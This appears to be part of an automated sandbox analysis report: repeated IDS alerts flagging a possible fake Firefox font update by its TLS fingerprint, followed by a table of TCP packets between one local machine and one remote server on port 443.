2024-11-26T08:12:15.703179+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49715	108.170.55.202	443	TCP
2024-11-26T08:12:17.524193+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49721	108.170.55.202	443	TCP
2024-11-26T08:12:19.920234+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49728	108.170.55.202	443	TCP
2024-11-26T08:12:21.806763+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49729	108.170.55.202	443	TCP
2024-11-26T08:12:24.073316+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49737	108.170.55.202	443	TCP
2024-11-26T08:12:25.967840+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49744	108.170.55.202	443	TCP
2024-11-26T08:12:28.320613+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49752	108.170.55.202	443	TCP
2024-11-26T08:12:30.481324+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49760	108.170.55.202	443	TCP
2024-11-26T08:12:32.876400+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49767	108.170.55.202	443	TCP
2024-11-26T08:12:34.802777+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49773	108.170.55.202	443	TCP
2024-11-26T08:12:37.141813+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49780	108.170.55.202	443	TCP
2024-11-26T08:12:39.020661+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49786	108.170.55.202	443	TCP
2024-11-26T08:12:41.309552+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49793	108.170.55.202	443	TCP
2024-11-26T08:12:43.143202+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49799	108.170.55.202	443	TCP
2024-11-26T08:12:45.806689+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49806	108.170.55.202	443	TCP
2024-11-26T08:12:47.762699+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49812	108.170.55.202	443	TCP
2024-11-26T08:12:50.115790+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49819	108.170.55.202	443	TCP
2024-11-26T08:12:52.206224+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49825	108.170.55.202	443	TCP
2024-11-26T08:12:54.864294+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49832	108.170.55.202	443	TCP
2024-11-26T08:12:56.779735+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49838	108.170.55.202	443	TCP
2024-11-26T08:12:59.051286+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49845	108.170.55.202	443	TCP
2024-11-26T08:13:00.973326+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49850	108.170.55.202	443	TCP
2024-11-26T08:13:03.808752+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49858	108.170.55.202	443	TCP
2024-11-26T08:13:05.681335+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49862	108.170.55.202	443	TCP
2024-11-26T08:13:07.999771+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49870	108.170.55.202	443	TCP
2024-11-26T08:13:10.086389+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49876	108.170.55.202	443	TCP
2024-11-26T08:13:12.514726+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49883	108.170.55.202	443	TCP
2024-11-26T08:13:14.409317+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49889	108.170.55.202	443	TCP
2024-11-26T08:13:16.873080+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49896	108.170.55.202	443	TCP
2024-11-26T08:13:18.757808+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49901	108.170.55.202	443	TCP
2024-11-26T08:13:21.057191+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49908	108.170.55.202	443	TCP
2024-11-26T08:13:22.981249+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49912	108.170.55.202	443	TCP
2024-11-26T08:13:25.303120+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49919	108.170.55.202	443	TCP
2024-11-26T08:13:27.176743+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49925	108.170.55.202	443	TCP
2024-11-26T08:13:29.476379+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49931	108.170.55.202	443	TCP
2024-11-26T08:13:31.616873+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49936	108.170.55.202	443	TCP
2024-11-26T08:13:34.158592+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49943	108.170.55.202	443	TCP
2024-11-26T08:13:36.181653+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49949	108.170.55.202	443	TCP
2024-11-26T08:13:38.479015+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49956	108.170.55.202	443	TCP
2024-11-26T08:13:40.317916+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49962	108.170.55.202	443	TCP
2024-11-26T08:13:42.565359+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49969	108.170.55.202	443	TCP
2024-11-26T08:13:44.398469+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49975	108.170.55.202	443	TCP
2024-11-26T08:13:46.690752+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49982	108.170.55.202	443	TCP
2024-11-26T08:13:48.528390+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49987	108.170.55.202	443	TCP
2024-11-26T08:13:50.843723+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49994	108.170.55.202	443	TCP
2024-11-26T08:13:52.816807+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49998	108.170.55.202	443	TCP
2024-11-26T08:13:55.446370+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50007	108.170.55.202	443	TCP
2024-11-26T08:13:57.332730+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50012	108.170.55.202	443	TCP
2024-11-26T08:13:59.711182+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50019	108.170.55.202	443	TCP
2024-11-26T08:14:01.552217+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50024	108.170.55.202	443	TCP
2024-11-26T08:14:03.797752+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50031	108.170.55.202	443	TCP
2024-11-26T08:14:05.871190+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50033	108.170.55.202	443	TCP
2024-11-26T08:14:08.509134+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50042	108.170.55.202	443	TCP
2024-11-26T08:14:10.501709+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50046	108.170.55.202	443	TCP
2024-11-26T08:14:13.037106+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50052	108.170.55.202	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2024 08:12:10.016161919 CET	49701	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:10.016196966 CET	443	49701	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:10.016288042 CET	49701	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:10.019814014 CET	49701	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:10.019860983 CET	443	49701	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:10.019927979 CET	49701	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:10.115051031 CET	49702	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:10.115104914 CET	443	49702	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:10.115241051 CET	49702	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:10.139875889 CET	49702	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:10.139909983 CET	443	49702	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:11.473593950 CET	443	49702	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:11.473686934 CET	49702	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:11.477001905 CET	49702	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:11.477010012 CET	443	49702	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:11.477253914 CET	443	49702	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:11.525558949 CET	49702	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:11.589829922 CET	49702	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:11.635334015 CET	443	49702	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:11.964827061 CET	443	49702	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:11.964895964 CET	443	49702	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:11.964956045 CET	49702	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:12.012799025 CET	49702	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:12.012818098 CET	443	49702	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:12.012852907 CET	49702	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:12.012859106 CET	443	49702	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:12.014624119 CET	49708	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:12.014688969 CET	443	49708	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:12.014786005 CET	49708	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:12.015036106 CET	49708	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:12.015054941 CET	443	49708	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:13.402012110 CET	443	49708	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:13.402766943 CET	49708	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:13.402781010 CET	443	49708	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:13.404623032 CET	49708	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:13.404627085 CET	443	49708	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:14.034531116 CET	443	49708	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:14.042324066 CET	443	49708	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:14.042481899 CET	49708	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:14.042511940 CET	443	49708	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:14.046984911 CET	443	49708	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:14.047055960 CET	49708	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:14.047168970 CET	49708	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:14.047192097 CET	443	49708	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:14.047208071 CET	49708	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:14.047214985 CET	443	49708	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:14.339895964 CET	49714	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:14.339942932 CET	443	49714	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:14.340049028 CET	49714	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:14.340167999 CET	49714	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:14.340221882 CET	443	49714	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:14.340282917 CET	49714	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:14.374778032 CET	49715	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:14.374839067 CET	443	49715	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:14.374939919 CET	49715	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:14.375274897 CET	49715	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:14.375297070 CET	443	49715	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:15.702950954 CET	443	49715	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:15.703178883 CET	49715	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:15.711822987 CET	49715	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:15.711846113 CET	443	49715	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:15.712121010 CET	443	49715	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:15.713253975 CET	49715	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:15.755342960 CET	443	49715	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:16.194538116 CET	443	49715	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:16.194602013 CET	443	49715	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:16.194653988 CET	49715	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:16.194884062 CET	49715	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:16.194935083 CET	443	49715	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:16.194951057 CET	49715	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:16.194962025 CET	443	49715	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:16.196078062 CET	49721	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:16.196122885 CET	443	49721	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:16.196190119 CET	49721	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:16.196362972 CET	49721	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:16.196377039 CET	443	49721	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:17.523571968 CET	443	49721	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:17.524193048 CET	49721	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:17.524229050 CET	443	49721	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:17.525080919 CET	49721	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:17.525088072 CET	443	49721	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:18.133162022 CET	443	49721	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:18.141617060 CET	443	49721	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:18.141727924 CET	49721	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:18.141746998 CET	443	49721	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:18.142292976 CET	443	49721	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:18.142359018 CET	49721	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:18.142664909 CET	49721	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:18.142680883 CET	443	49721	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:18.142689943 CET	49721	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:18.142697096 CET	443	49721	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:18.380394936 CET	49725	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:18.380441904 CET	443	49725	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:18.380522013 CET	49725	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:18.381956100 CET	49725	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:18.381999016 CET	443	49725	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:18.382358074 CET	49725	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:18.499325991 CET	49728	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:18.499361992 CET	443	49728	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:18.499643087 CET	49728	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:18.500080109 CET	49728	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:18.500092030 CET	443	49728	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:19.920125961 CET	443	49728	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:19.920233965 CET	49728	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:19.952872038 CET	49728	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:19.952905893 CET	443	49728	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:19.953197002 CET	443	49728	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:19.960510015 CET	49728	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:20.003345013 CET	443	49728	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:20.430715084 CET	443	49728	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:20.430881977 CET	443	49728	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:20.430948019 CET	49728	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:20.431044102 CET	49728	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:20.431061029 CET	443	49728	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:20.431076050 CET	49728	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:20.431081057 CET	443	49728	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:20.432204962 CET	49729	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:20.432238102 CET	443	49729	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:20.432394028 CET	49729	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:20.432707071 CET	49729	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:20.432717085 CET	443	49729	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:21.806054115 CET	443	49729	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:21.806762934 CET	49729	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:21.806796074 CET	443	49729	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:21.807830095 CET	49729	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:21.807842016 CET	443	49729	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:22.426460028 CET	443	49729	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:22.426505089 CET	443	49729	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:22.426594019 CET	49729	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:22.426615953 CET	443	49729	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:22.429768085 CET	443	49729	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:22.429840088 CET	49729	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:22.429941893 CET	49729	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:22.429955959 CET	443	49729	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:22.429975033 CET	49729	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:22.429980040 CET	443	49729	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:22.686110020 CET	49736	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:22.686146021 CET	443	49736	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:22.686392069 CET	49736	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:22.686525106 CET	49736	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:22.686573029 CET	443	49736	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:22.686691046 CET	49736	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:22.698769093 CET	49737	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:22.698818922 CET	443	49737	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:22.698904037 CET	49737	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:22.699233055 CET	49737	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:22.699251890 CET	443	49737	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:24.073182106 CET	443	49737	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:24.073316097 CET	49737	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:24.074872017 CET	49737	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:24.074883938 CET	443	49737	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:24.075144053 CET	443	49737	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:24.076410055 CET	49737	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:24.123339891 CET	443	49737	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:24.576108932 CET	443	49737	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:24.576186895 CET	443	49737	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:24.576248884 CET	49737	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:24.590677023 CET	49737	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:24.590701103 CET	443	49737	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:24.590713024 CET	49737	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:24.590723991 CET	443	49737	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:24.592082977 CET	49744	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:24.592111111 CET	443	49744	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:24.592178106 CET	49744	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:24.592411041 CET	49744	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:24.592422962 CET	443	49744	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:25.967288017 CET	443	49744	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:25.967839956 CET	49744	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:25.967878103 CET	443	49744	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:25.968797922 CET	49744	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:25.968803883 CET	443	49744	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:26.594070911 CET	443	49744	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:26.602533102 CET	443	49744	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:26.602624893 CET	49744	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:26.602657080 CET	443	49744	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:26.606641054 CET	443	49744	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:26.606786966 CET	49744	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:26.606856108 CET	49744	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:26.606873035 CET	443	49744	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:26.606904984 CET	49744	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:26.606910944 CET	443	49744	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:26.847978115 CET	49751	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:26.848022938 CET	443	49751	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:26.848141909 CET	49751	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:26.849581957 CET	49751	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:26.849636078 CET	443	49751	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:26.849742889 CET	49751	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:26.944430113 CET	49752	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:26.944485903 CET	443	49752	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:26.944675922 CET	49752	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:26.946022987 CET	49752	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:26.946038961 CET	443	49752	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:28.320497990 CET	443	49752	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:28.320612907 CET	49752	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:28.569971085 CET	49752	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:28.570013046 CET	443	49752	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:28.570517063 CET	443	49752	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:28.620831013 CET	49752	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:28.672669888 CET	49752	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:28.719336033 CET	443	49752	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:29.055474043 CET	443	49752	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:29.055541992 CET	443	49752	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:29.055609941 CET	49752	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:29.056060076 CET	49752	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:29.056082010 CET	443	49752	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:29.056097984 CET	49752	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:29.056104898 CET	443	49752	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:29.057535887 CET	49760	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:29.057580948 CET	443	49760	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:29.057651997 CET	49760	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:29.057905912 CET	49760	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:29.057920933 CET	443	49760	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:30.480158091 CET	443	49760	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:30.481323957 CET	49760	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:30.481350899 CET	443	49760	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:30.489115000 CET	49760	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:30.489124060 CET	443	49760	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:31.115988970 CET	443	49760	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:31.116280079 CET	443	49760	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:31.116602898 CET	49760	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:31.116619110 CET	443	49760	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:31.120374918 CET	443	49760	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:31.121181011 CET	49760	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:31.121471882 CET	49760	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:31.121471882 CET	49760	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:31.121504068 CET	443	49760	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:31.121515036 CET	443	49760	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:31.401447058 CET	49766	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:31.401489019 CET	443	49766	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:31.401578903 CET	49766	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:31.450136900 CET	49766	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:31.450200081 CET	443	49766	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:31.453142881 CET	49766	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:31.494309902 CET	49767	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:31.494347095 CET	443	49767	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:31.494479895 CET	49767	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:31.501871109 CET	49767	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:31.501888037 CET	443	49767	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:32.876208067 CET	443	49767	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:32.876399994 CET	49767	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:32.879209995 CET	49767	443	192.168.2.7	108.170.55.202
